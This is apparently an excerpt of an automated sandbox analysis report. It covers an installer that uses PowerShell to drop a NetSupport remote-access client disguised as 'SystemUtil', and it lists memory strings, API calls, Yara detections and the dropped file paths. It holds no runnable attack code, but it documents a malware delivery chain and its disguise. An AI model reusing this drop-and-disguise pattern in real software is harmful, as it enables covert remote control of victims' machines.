                                  Source: KC0uZWwr8p.tmp, 00000001.00000002.1996182111.00000000010EC000.00000004.00000010.00020000.00000000.sdmp, KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, is-0LL3Q.tmp.1.dr, is-MH1O8.tmp.1.dr, is-BPHN2.tmp.1.drString found in binary or memory: http://s.symcd.com0_
                                  Source: KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004C18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.3.dr, pcicapi.dll.3.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                                  Source: KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004C18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.3.dr, pcicapi.dll.3.drString found in binary or memory: http://s2.symcb.com0
                                  Source: powershell.exe, 00000003.00000002.1912534174.0000000004F39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004726000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                                  Source: powershell.exe, 00000003.00000002.1912534174.00000000045D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                  Source: powershell.exe, 00000003.00000002.1912534174.0000000004F39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004726000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                                  Source: KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://sf.symcb.com/sf.crl0a
                                  Source: powershell.exe, 00000003.00000002.1912534174.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004726000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sf.symcb.com/sf.crl0f
                                  Source: KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004726000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sf.symcb.com/sf.crt0
                                  Source: KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004726000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sf.symcd.com0&
                                  Source: KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004C18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.3.dr, pcicapi.dll.3.drString found in binary or memory: http://sv.symcb.com/sv.crl0f
                                  Source: KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004C18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.3.dr, pcicapi.dll.3.drString found in binary or memory: http://sv.symcb.com/sv.crt0
                                  Source: KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004C18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.3.dr, pcicapi.dll.3.drString found in binary or memory: http://sv.symcd.com0&
                                  Source: KC0uZWwr8p.tmp, 00000001.00000002.1996182111.00000000010EC000.00000004.00000010.00020000.00000000.sdmp, KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, is-0LL3Q.tmp.1.dr, is-MH1O8.tmp.1.dr, is-BPHN2.tmp.1.drString found in binary or memory: http://sw.symcb.com/sw.crl0
                                  Source: KC0uZWwr8p.tmp, 00000001.00000002.1996182111.00000000010EC000.00000004.00000010.00020000.00000000.sdmp, KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, is-0LL3Q.tmp.1.dr, is-MH1O8.tmp.1.dr, is-BPHN2.tmp.1.drString found in binary or memory: http://sw.symcd.com0
                                  Source: KC0uZWwr8p.tmp, 00000001.00000002.1996182111.00000000010EC000.00000004.00000010.00020000.00000000.sdmp, KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, is-0LL3Q.tmp.1.dr, is-MH1O8.tmp.1.dr, is-BPHN2.tmp.1.drString found in binary or memory: http://sw1.symcb.com/sw.crt0
                                  Source: is-0LL3Q.tmp.1.drString found in binary or memory: http://trolltech.com/xml/features/report-start-end-entity
                                  Source: is-0LL3Q.tmp.1.drString found in binary or memory: http://trolltech.com/xml/features/report-whitespace-only-CharData
                                  Source: KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, is-0LL3Q.tmp.1.dr, is-MH1O8.tmp.1.dr, is-BPHN2.tmp.1.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
                                  Source: KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004A76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                                  Source: KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, is-0LL3Q.tmp.1.dr, is-MH1O8.tmp.1.dr, is-BPHN2.tmp.1.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
                                  Source: KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004A76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                                  Source: KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004A76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                                  Source: KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, is-0LL3Q.tmp.1.dr, is-MH1O8.tmp.1.dr, is-BPHN2.tmp.1.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
                                  Source: KC0uZWwr8p.tmp, 00000001.00000002.1996182111.00000000010EC000.00000004.00000010.00020000.00000000.sdmp, KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, is-0LL3Q.tmp.1.dr, is-MH1O8.tmp.1.dr, is-BPHN2.tmp.1.drString found in binary or memory: http://www.advanced-ip-scanner.com0
                                  Source: powershell.exe, 00000003.00000002.1912534174.0000000004726000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                  Source: KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.macrovision.com0
                                  Source: client32.exe, 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2034732030.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2118509299.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
                                  Source: client32.exe, 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2034732030.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2118509299.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp11(
                                  Source: powershell.exe, 00000003.00000002.1912534174.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004726000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.netsupportsoftware.com
                                  Source: is-BPHN2.tmp.1.drString found in binary or memory: http://www.openssl.org/V
                                  Source: is-BPHN2.tmp.1.drString found in binary or memory: http://www.openssl.org/support/faq.html
                                  Source: client32.exe, 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2034732030.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2118509299.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpString found in binary or memory: http://www.pci.co.uk/support
                                  Source: client32.exe, 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2034732030.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2118509299.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpString found in binary or memory: http://www.pci.co.uk/supportsupport
                                  Source: KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.radmin.com
                                  Source: KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004C18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.3.dr, pcicapi.dll.3.drString found in binary or memory: http://www.symauth.com/cps0(
                                  Source: KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004C18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.3.dr, pcicapi.dll.3.drString found in binary or memory: http://www.symauth.com/rpa00
                                  Source: KC0uZWwr8p.exe, 00000000.00000003.1998537758.0000000000E71000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.uninetutility.com
                                  Source: KC0uZWwr8p.exe, 00000000.00000003.1998537758.0000000000E4D000.00000004.00001000.00020000.00000000.sdmp, KC0uZWwr8p.tmp, 00000001.00000003.1993202352.0000000002ECD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.uninetutility.com/support
                                  Source: KC0uZWwr8p.tmp, 00000001.00000003.1993202352.0000000002EDC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.uninetutility.com/update
                                  Source: KC0uZWwr8p.exe, 00000000.00000003.1998537758.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.uninetutility.com/update)
                                  Source: KC0uZWwr8p.tmp, 00000001.00000003.1993202352.0000000002EF1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.uninetutility.comQV
                                  Source: is-0LL3Q.tmp.1.drString found in binary or memory: http://xml.org/sax/features/namespace-prefixes
                                  Source: is-0LL3Q.tmp.1.drString found in binary or memory: http://xml.org/sax/features/namespaces
                                  Source: is-0LL3Q.tmp.1.drString found in binary or memory: http://xml.org/sax/features/namespaceshttp://xml.org/sax/features/namespace-prefixeshttp://trolltech
                                  Source: powershell.exe, 00000003.00000002.1912534174.00000000045D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                                  Source: powershell.exe, 00000003.00000002.1923156190.0000000006038000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                                  Source: powershell.exe, 00000003.00000002.1923156190.0000000006038000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                                  Source: powershell.exe, 00000003.00000002.1923156190.0000000006038000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                                  Source: KC0uZWwr8p.tmp, 00000001.00000002.1996182111.00000000010EC000.00000004.00000010.00020000.00000000.sdmp, KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004726000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004C18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.3.dr, is-0LL3Q.tmp.1.dr, is-MH1O8.tmp.1.dr, is-BPHN2.tmp.1.dr, pcicapi.dll.3.drString found in binary or memory: https://d.symcb.com/cps0%
                                  Source: is-BPHN2.tmp.1.dr, pcicapi.dll.3.drString found in binary or memory: https://d.symcb.com/rpa0
                                  Source: KC0uZWwr8p.tmp, 00000001.00000002.1996182111.00000000010EC000.00000004.00000010.00020000.00000000.sdmp, KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, is-0LL3Q.tmp.1.dr, is-MH1O8.tmp.1.dr, is-BPHN2.tmp.1.drString found in binary or memory: https://d.symcb.com/rpa0)
                                  Source: KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, is-0LL3Q.tmp.1.dr, is-MH1O8.tmp.1.dr, is-BPHN2.tmp.1.drString found in binary or memory: https://d.symcb.com/rpa0.
                                  Source: powershell.exe, 00000003.00000002.1912534174.0000000004726000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                  Source: KC0uZWwr8p.exeString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
                                  Source: powershell.exe, 00000003.00000002.1923156190.0000000006038000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                                  Source: powershell.exe, 00000003.00000002.1912534174.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                                  Source: powershell.exe, 00000003.00000002.1912534174.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0D
                                  Source: KC0uZWwr8p.exe, 00000000.00000003.1647342710.0000000002B00000.00000004.00001000.00020000.00000000.sdmp, KC0uZWwr8p.exe, 00000000.00000003.1648007586.000000007EB2B000.00000004.00001000.00020000.00000000.sdmp, KC0uZWwr8p.tmp, 00000001.00000000.1649520541.00000000004C1000.00000020.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.innosetup.com/
                                  Source: KC0uZWwr8p.exe, 00000000.00000003.1647342710.0000000002B00000.00000004.00001000.00020000.00000000.sdmp, KC0uZWwr8p.exe, 00000000.00000003.1648007586.000000007EB2B000.00000004.00001000.00020000.00000000.sdmp, KC0uZWwr8p.tmp, 00000001.00000000.1649520541.00000000004C1000.00000020.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.remobjects.com/ps
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_1101F360 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,7_2_1101F360
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_1101F360 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,7_2_1101F360
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_11032930 GetClipboardFormatNameA,SetClipboardData,7_2_11032930
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_1101F360 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,8_2_1101F360
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_11032930 GetClipboardFormatNameA,SetClipboardData,8_2_11032930
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_11031AC0 IsClipboardFormatAvailable,GetClipboardData,GlobalSize,GlobalLock,_memmove,GlobalUnlock,7_2_11031AC0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_11007720 LoadCursorA,SetCursor,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateDCA,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectClipRgn,BitBlt,SelectClipRgn,DeleteObject,DeleteDC,BitBlt,ReleaseDC,CreatePen,CreateSolidBrush,GetSysColor,LoadBitmapA,_memset,_swscanf,CreateFontIndirectA,_memset,GetStockObject,GetObjectA,CreateFontIndirectA,GetWindowRect,SetWindowTextA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,UpdateWindow,SetCursor,7_2_11007720
                                  Source: Yara matchFile source: 10.2.client32.exe.111b3308.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 8.2.client32.exe.111b3308.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 7.2.client32.exe.111b3308.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 10.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 7.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 8.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000A.00000002.2117662309.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000008.00000002.2034698916.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: client32.exe PID: 4008, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: client32.exe PID: 2004, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: client32.exe PID: 7072, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\SystemUtil\PCICL32.DLL, type: DROPPED

                                  Spam, unwanted Advertisements and Ransom Demands

                                  barindex
                                  Contains functionalty to change the wallpaper
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_11112840 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,7_2_11112840
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_11112840 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,8_2_11112840

                                  System Summary

                                  barindex
                                  Malicious sample detected (through community Yara rule)
                                  Source: amsi32_5448.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                                  Source: Process Memory Space: powershell.exe PID: 5448, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                                  Powershell drops PE file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\SystemUtil\PCICL32.DLLJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\SystemUtil\HTCTL32.DLLJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\SystemUtil\PCICHEK.DLLJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\SystemUtil\TCCTL32.DLLJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\SystemUtil\AudioCapture.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\SystemUtil\msvcr100.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\SystemUtil\remcmdstub.exeJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\SystemUtil\pcicapi.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeProcess Stats: CPU usage > 49%
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_110A9240: DeviceIoControl,7_2_110A9240
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_1115A340 FindWindowA,_memset,CreateProcessAsUserA,GetLastError,WinExec,CloseHandle,CloseHandle,CloseHandle,WinExec,7_2_1115A340
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_1102CE2D InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,7_2_1102CE2D
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_1102CE2D InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,8_2_1102CE2D
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_07FD38023_2_07FD3802
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_110292307_2_11029230
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_110724607_2_11072460
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_1115B1807_2_1115B180
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_1107F5207_2_1107F520
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_1101B9807_2_1101B980
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_1115F9F07_2_1115F9F0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_1101BDC07_2_1101BDC0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_11163C557_2_11163C55
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_110504307_2_11050430
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_110088DB7_2_110088DB
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_1101CBE07_2_1101CBE0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_11032A607_2_11032A60
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_11086DA07_2_11086DA0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_11044C607_2_11044C60
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_6859A9807_2_6859A980
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_685C49107_2_685C4910
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_685C39237_2_685C3923
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_6859DBA07_2_6859DBA0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_685C3DB87_2_685C3DB8
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_685CA0637_2_685CA063
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_685C41567_2_685C4156
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_685913107_2_68591310
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_685B43C07_2_685B43C0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_685A84F07_2_685A84F0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_685C45287_2_685C4528
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_685917607_2_68591760
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_688609157_2_68860915
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_688009197_2_68800919
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_6881EB1A7_2_6881EB1A
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_1115B1808_2_1115B180
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_110292308_2_11029230
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_1107F5208_2_1107F520
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_1101B9808_2_1101B980
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_1115F9F08_2_1115F9F0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_1101BDC08_2_1101BDC0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_11163C558_2_11163C55
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_110504308_2_11050430
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_110724608_2_11072460
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_110088DB8_2_110088DB
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_1101CBE08_2_1101CBE0
